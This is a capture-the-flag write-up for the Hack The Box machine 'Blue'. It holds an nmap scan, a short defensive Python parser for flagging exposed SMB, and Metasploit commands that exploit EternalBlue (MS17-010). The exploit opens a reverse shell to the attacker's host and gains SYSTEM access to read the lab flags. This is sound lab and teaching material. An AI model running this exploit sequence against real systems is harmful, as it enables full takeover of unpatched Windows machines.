HTB: Blue

Details

This machine is Blue from Hack The Box.

Recon

I started with an nmap scan

root@kali:~# nmap -sV -p- -T4 10.10.10.40
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-07 14:42 EDT
Nmap scan report for 10.10.10.40
Host is up (0.041s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.41 seconds
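As an added example (not part of the original writeup), the following Python parses the nmap normal-output block above and applies the triage a defender would do with it: any host exposing 445/tcp with a legacy Windows banner goes to the top of the MS17-010 patch-verification list and should have SMB filtered at the network edge. The sample text is constructed from the scan shown on this page; the function names are my own.

```python
import re

# Constructed sample: the nmap normal-output block from this writeup.
NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.40
Host is up (0.041s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# One port line: "445/tcp   open  microsoft-ds <free-text version banner>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")


def parse_nmap(text):
    """Return (host, [(port, proto, state, service, version), ...])."""
    host, ports = None, []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append((int(port), proto, state, service, version.strip()))
    return host, ports


def smb_exposure(ports):
    """Flag open 445/tcp; mark it legacy when the banner names a pre-Windows-10
    client build, which is where MS17-010 patch status must be verified first."""
    findings = []
    for port, proto, state, service, version in ports:
        if port == 445 and proto == "tcp" and state == "open":
            legacy = bool(re.search(r"Windows (XP|Vista|7|8)", version))
            findings.append({"port": port, "legacy_banner": legacy, "version": version})
    return findings
```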

Blue

Well, the machine is called Blue and SMB is open, so EternalBlue (MS17-010) seems like a good start.

root@kali:~# msfconsole

msf5 > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.34
LHOST => 10.10.14.34

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.10.14.35:4444
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! -
[SNIP]
[*] Command shell session 1 opened (10.10.14.35:4444 -> 10.10.10.40:49158) at 2019-07-07 14:47:44 -0400
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
C:\Windows\system32>

And there is a shell.

C:\Windows\system32>whoami
nt authority\system

Now for my flags.

C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users

21/07/2017  07:56    <DIR>          .
21/07/2017  07:56    <DIR>          ..
21/07/2017  07:56    <DIR>          Administrator
14/07/2017  14:45    <DIR>          haris
12/04/2011  08:51    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  15,753,904,128 bytes free

C:\Users>cd haris/desktop

C:\Users\haris\Desktop>type user.txt
[REDACTED]

C:\Users\haris\Desktop>cd ../../Administrator/Desktop

C:\Users\Administrator\Desktop>type root.txt
[REDACTED]
